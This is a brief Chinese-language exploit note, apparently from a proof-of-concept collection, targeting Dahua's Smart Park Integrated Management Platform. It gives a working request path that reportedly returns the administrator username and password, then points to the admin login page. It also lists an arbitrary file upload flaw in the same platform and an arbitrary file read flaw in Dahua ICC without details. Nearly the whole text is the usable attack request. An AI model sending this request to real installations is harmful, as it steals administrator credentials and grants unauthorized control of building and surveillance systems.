大华 智慧园区综合管理平台 user_getUserInfoByUserName.action 中存在API接口,导致管理园账号密码泄漏
请求POC
/admin/user_getUserInfoByUserName.action?userName=system
获取后访问地址
/admin/login_login.action
大华 智慧园区综合管理平台 user_save.action 任意文件上传漏洞 大华 ICC智能物联综合管理平台 readPic 任意文件读取漏洞